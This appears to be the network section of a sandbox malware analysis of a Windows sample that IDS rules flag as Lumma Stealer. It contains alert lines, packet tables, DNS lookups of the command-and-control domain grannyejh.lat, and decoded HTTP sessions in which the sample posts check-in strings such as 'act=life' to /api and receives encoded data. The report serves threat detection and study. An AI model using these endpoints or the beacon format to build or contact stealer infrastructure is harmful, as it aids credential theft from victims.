2024-12-18T21:17:14.417710+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49723 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:17.614166+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49723 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:19.368228+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.7 | 49735 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:19.368228+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49735 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:25.397542+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.7 | 49754 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:25.397542+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49754 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:30.868317+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.7 | 49765 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:30.868317+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49765 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:36.349023+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.7 | 49781 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:36.349023+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49781 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:44.738101+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.7 | 49802 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:44.738101+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49802 | 172.67.179.109 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                            Dec 18, 2024 21:17:02.571930885 CET44349700172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:05.699903965 CET44349700172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:05.700011969 CET44349700172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:05.700267076 CET49700443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:05.702126026 CET49700443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:05.702147961 CET44349700172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:05.711177111 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:05.711206913 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:05.711287022 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:05.711576939 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:05.711591005 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:06.952418089 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:06.952490091 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:06.996897936 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:06.996917009 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:06.997253895 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:07.017692089 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:07.017710924 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:07.017786026 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.833542109 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.833580017 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.833617926 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.833630085 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.833642960 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:12.833657980 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.833677053 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.833692074 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:12.833719015 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:12.833726883 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.840617895 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.840692043 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:12.840701103 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.848973036 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.849050045 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:12.849060059 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.893412113 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:12.893419027 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.940291882 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:12.953397036 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:13.002804995 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.025302887 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:13.029535055 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:13.029643059 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.029650927 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:13.029726982 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.029859066 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.029870987 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:13.029880047 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.029884100 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:13.198458910 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.198499918 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:13.198592901 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.198983908 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.198997021 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:14.417534113 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:14.417710066 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:14.419015884 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:14.419028044 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:14.419279099 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:14.420600891 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:14.420716047 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:14.420748949 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:17.614136934 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:17.614233017 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:17.614346981 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:17.614512920 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:17.614552975 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:18.134344101 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:18.134372950 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:18.134486914 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:18.134828091 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:18.134839058 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:19.368026972 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:19.368227959 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:19.369345903 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:19.369364023 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:19.369631052 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:19.370811939 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:19.370992899 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:19.371026993 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:19.373413086 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:19.419338942 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:23.955187082 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:23.955291986 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:23.955391884 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:23.955477953 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:23.955498934 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:24.180882931 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:24.180938005 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:24.181011915 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:24.181297064 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:24.181318998 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:25.397434950 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:25.397542000 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:25.400211096 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:25.400221109 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:25.400477886 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:25.408830881 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:25.408942938 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:25.408978939 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:25.409044027 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:25.409054041 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:29.321449995 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:29.321727991 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:29.321769953 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:29.321793079 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:29.629468918 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:29.629503012 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:29.629571915 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:29.629870892 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:29.629883051 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:30.868172884 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:30.868316889 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:30.869710922 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:30.869718075 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:30.870062113 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:30.871454000 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:30.871576071 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:30.871581078 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:34.691278934 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:34.691494942 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:34.691519022 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:34.691571951 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:35.127744913 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:35.127784014 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:35.127871990 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:35.128267050 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:35.128281116 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.348922968 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.349023104 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.350234985 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.350243092 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.350471973 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.354610920 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.355267048 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.355298996 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.355623960 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.355655909 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.356777906 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.356815100 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.356926918 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.356965065 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.357079983 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.357110977 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.357239962 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.357256889 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.357264996 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.357278109 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.357388973 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.357414007 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.357429981 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.357522964 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.357549906 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.399333000 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.399487972 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.399517059 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.399540901 CET49781443192.168.2.7172.67.179.109
Dec 18, 2024 21:17:36.399560928 CET | 443 | 49781 | 172.67.179.109 | 192.168.2.7
Dec 18, 2024 21:17:36.399580956 CET | 49781 | 443 | 192.168.2.7 | 172.67.179.109
Dec 18, 2024 21:17:36.399594069 CET | 443 | 49781 | 172.67.179.109 | 192.168.2.7
Dec 18, 2024 21:17:44.253057003 CET | 443 | 49781 | 172.67.179.109 | 192.168.2.7
Dec 18, 2024 21:17:44.253156900 CET | 443 | 49781 | 172.67.179.109 | 192.168.2.7
Dec 18, 2024 21:17:44.253197908 CET | 49781 | 443 | 192.168.2.7 | 172.67.179.109
Dec 18, 2024 21:17:44.253643036 CET | 49781 | 443 | 192.168.2.7 | 172.67.179.109
Dec 18, 2024 21:17:44.253659964 CET | 443 | 49781 | 172.67.179.109 | 192.168.2.7
Dec 18, 2024 21:17:44.262614012 CET | 49802 | 443 | 192.168.2.7 | 172.67.179.109
Dec 18, 2024 21:17:44.262648106 CET | 443 | 49802 | 172.67.179.109 | 192.168.2.7
Dec 18, 2024 21:17:44.262734890 CET | 49802 | 443 | 192.168.2.7 | 172.67.179.109
Dec 18, 2024 21:17:44.263021946 CET | 49802 | 443 | 192.168.2.7 | 172.67.179.109
Dec 18, 2024 21:17:44.263031960 CET | 443 | 49802 | 172.67.179.109 | 192.168.2.7
Dec 18, 2024 21:17:44.738101006 CET | 49802 | 443 | 192.168.2.7 | 172.67.179.109
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 21:17:00.797971964 CET | 64749 | 53 | 192.168.2.7 | 1.1.1.1
Dec 18, 2024 21:17:00.935585976 CET | 53 | 64749 | 1.1.1.1 | 192.168.2.7
Dec 18, 2024 21:17:00.944390059 CET | 64619 | 53 | 192.168.2.7 | 1.1.1.1
Dec 18, 2024 21:17:01.084244967 CET | 53 | 64619 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 21:17:00.797971964 CET | 192.168.2.7 | 1.1.1.1 | 0x34f6 | Standard query (0) | sweepyribs.lat | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:17:00.944390059 CET | 192.168.2.7 | 1.1.1.1 | 0x4664 | Standard query (0) | grannyejh.lat | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 21:17:00.935585976 CET | 1.1.1.1 | 192.168.2.7 | 0x34f6 | Name error (3) | sweepyribs.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:17:01.084244967 CET | 1.1.1.1 | 192.168.2.7 | 0x4664 | No error (0) | grannyejh.lat | | 172.67.179.109 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:17:01.084244967 CET | 1.1.1.1 | 192.168.2.7 | 0x4664 | No error (0) | grannyejh.lat | | 104.21.64.80 | A (IP address) | IN (0x0001) | false
• grannyejh.lat
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 172.67.179.109 | 443 | 7392 | C:\Users\user\Desktop\pPizCGDvrx.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:17:02 UTC | 260 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: grannyejh.lat
2024-12-18 20:17:02 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-18 20:17:05 UTC | 1029 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 20:17:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=2cc8p0e5jjg5q00jth0v436pkt; expires=Sun, 13-Apr-2025 14:03:42 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LTY6TpchHDXn1eoSB%2Fp5ETrCYHua7MWhNI2o89i0e6L1MVU43ESuVbgAwyIllac89abXv%2F1JNT9e%2FhknCDbMC2cHesEtGZDEhxK%2FiRO3TGG3Eehpz6QKXhtamiAfKI5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f41d5882a654375-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=858&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4200&recv_bytes=904&delivery_rate=59424&cwnd=226&unsent_bytes=0&cid=2b956e0f342bc4f7&ts=3288&x=0"
2024-12-18 20:17:05 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-18 20:17:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49702 | 172.67.179.109 | 443 | 7392 | C:\Users\user\Desktop\pPizCGDvrx.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:17:07 UTC | 261 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: grannyejh.lat
2024-12-18 20:17:07 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-18 20:17:12 UTC | 1027 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 20:17:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=9p5ihud7j3ci55cqgneehe1irf; expires=Sun, 13-Apr-2025 14:03:47 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bEAtobyNQAzPgjjfNvQZPD0Vm3hc8NV5tdCuZZ3g0ScLjWYqBIV0odFJJcaFuQZwO2R%2BVMW2IUuv95kQIvW3i8idcFw70AeIWOjuk1nP61innm%2F6sTeDOiPVBTcCER4V"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f41d5a51b9f5e71-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1724&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=944&delivery_rate=1647855&cwnd=238&unsent_bytes=0&cid=0705a8d904a975e6&ts=5913&x=0"
2024-12-18 20:17:12 UTC | 342 | IN | Data Raw: 33 65 37 35 0d 0a 6d 75 53 70 4a 72 52 33 6e 45 68 72 6c 38 64 4d 44 4e 4b 77 4a 37 36 36 64 70 69 6b 30 4e 73 50 45 34 44 45 33 4c 4d 44 73 41 44 68 78 74 38 45 6a 6b 4f 77 61 68 6a 79 35 58 5a 34 6f 4d 56 43 6b 70 67 58 2f 49 62 71 76 57 35 2f 38 36 48 77 6b 58 58 64 49 71 43 43 79 45 72 48 45 72 42 71 44 75 2f 6c 64 6c 65 70 6b 6b 4c 51 6d 45 79 36 77 62 71 35 62 6e 2f 69 70 62 66 63 63 39 78 6a 38 6f 6a 4f 54 74 45 55 2b 43 6b 48 2b 71 49 70 61 62 50 61 53 64 66 58 48 76 57 47 2f 50 6c 71 61 61 4c 2b 2f 76 35 6d 78 47 48 58 68 64 70 4e 6c 67 71 77 4d 30 6e 79 71 57 34 32 38 4e 46 43 33 4e 59 51 2f 4d 2b 34 73 32 64 33 34 36 43 32 77 32 72 57 61 50 4b 47 7a 55 2f 62 48 65 77 6b 44 66 32 70 4c 32 4f 7a 6b 67 75 63 33 77 79 36 6e 76 4c 71 58 33 4c 7a 74
Data Ascii: 3e75muSpJrR3nEhrl8dMDNKwJ766dpik0NsPE4DE3LMDsADhxt8EjkOwahjy5XZ4oMVCkpgX/IbqvW5/86HwkXXdIqCCyErHErBqDu/ldlepkkLQmEy6wbq5bn/ipbfcc9xj8ojOTtEU+CkH+qIpabPaSdfXHvWG/PlqaaL+/v5mxGHXhdpNlgqwM0nyqW428NFC3NYQ/M+4s2d346C2w2rWaPKGzU/bHewkDf2pL2Ozkguc3wy6nvLqX3Lzt
2024-12-18 20:17:12 UTC | 1369 | IN | Data Raw: 6b 57 62 65 49 71 44 47 7a 55 72 58 47 50 34 34 41 66 36 75 4b 33 79 37 32 30 6a 52 32 42 6e 77 79 62 47 35 61 6e 76 6f 71 62 54 56 62 4e 39 6b 2b 49 61 4c 43 70 59 53 35 6d 70 52 74 59 59 72 66 72 66 65 55 35 37 69 56 4f 57 49 71 2f 6c 71 66 61 4c 2b 2f 74 6c 6b 30 57 48 7a 69 63 68 4d 33 51 66 2b 4f 41 2f 34 6f 44 78 6f 74 64 78 50 33 38 6f 65 39 4d 43 78 73 47 5a 34 35 36 47 36 6b 53 2b 53 5a 65 44 47 6b 77 54 33 47 50 55 6d 41 2b 4b 6c 62 6e 48 2b 79 77 58 62 31 46 53 69 68 72 61 34 61 58 44 6d 71 4c 44 56 62 64 52 73 39 59 6e 4e 54 74 59 53 39 43 49 42 39 4b 67 6c 59 62 44 58 53 4e 6a 65 47 50 76 44 38 76 63 74 64 76 72 6d 35 70 46 50 31 57 48 71 78 50 35 48 32 42 76 35 50 45 6e 71 36 7a 63 75 74 39 34 46 68 4a 67 61 2f 38 6d 67 75 48 39 30 37 4c 53
Data Ascii: kWbeIqDGzUrXGP44Af6uK3y720jR2BnwybG5anvoqbTVbN9k+IaLCpYS5mpRtYYrfrfeU57iVOWIq/lqfaL+/tlk0WHzichM3Qf+OA/4oDxotdxP38oe9MCxsGZ456G6kS+SZeDGkwT3GPUmA+KlbnH+ywXb1FSihra4aXDmqLDVbdRs9YnNTtYS9CIB9KglYbDXSNjeGPvD8vctdvrm5pFP1WHqxP5H2Bv5PEnq6zcut94FhJga/8mguH907LS
2024-12-18 20:17:12 UTC | 1369 | IN | Data Raw: 33 58 7a 78 50 35 48 32 42 76 35 50 45 6e 71 36 7a 63 75 74 39 34 46 68 4a 67 5a 38 73 4f 33 74 6d 78 37 37 4b 4f 30 33 57 6e 63 59 65 71 4a 7a 30 54 61 48 66 51 6e 42 2f 47 74 4a 32 57 37 31 45 58 64 30 6c 53 30 68 72 57 68 4c 53 6d 69 6b 72 6e 64 62 4e 30 67 7a 59 58 46 53 74 45 44 76 6a 56 48 37 4f 55 70 59 76 43 4b 42 64 44 52 46 50 48 4d 74 72 6c 71 66 4f 65 6c 75 64 4a 73 31 57 6a 32 67 63 39 49 33 78 6a 34 4b 67 37 78 6f 44 78 72 75 64 35 4a 6e 4a 5a 55 2f 64 37 79 34 53 31 65 35 62 43 39 2f 6d 4c 44 61 37 69 5a 68 56 32 57 45 76 4a 71 55 62 57 69 4b 32 61 37 31 45 33 63 79 68 48 30 7a 62 4f 7a 61 33 44 76 71 72 6a 52 59 4e 4a 6b 39 49 62 4d 51 38 51 48 2b 79 77 62 2f 2b 56 67 4c 72 66 4b 42 59 53 59 49 75 72 52 6f 36 38 76 52 4f 47 6f 73 4e 5a 33
Data Ascii: 3XzxP5H2Bv5PEnq6zcut94FhJgZ8sO3tmx77KO03WncYeqJz0TaHfQnB/GtJ2W71EXd0lS0hrWhLSmikrndbN0gzYXFStEDvjVH7OUpYvCKBdDRFPHMtrlqfOeludJs1Wj2gc9I3xj4Kg7xoDxrud5JnJZU/d7y4S1e5bC9/mLDa7iZhV2WEvJqUbWiK2a71E3cyhH0zbOza3DvqrjRYNJk9IbMQ8QH+ywb/+VgLrfKBYSYIurRo68vROGosNZ3
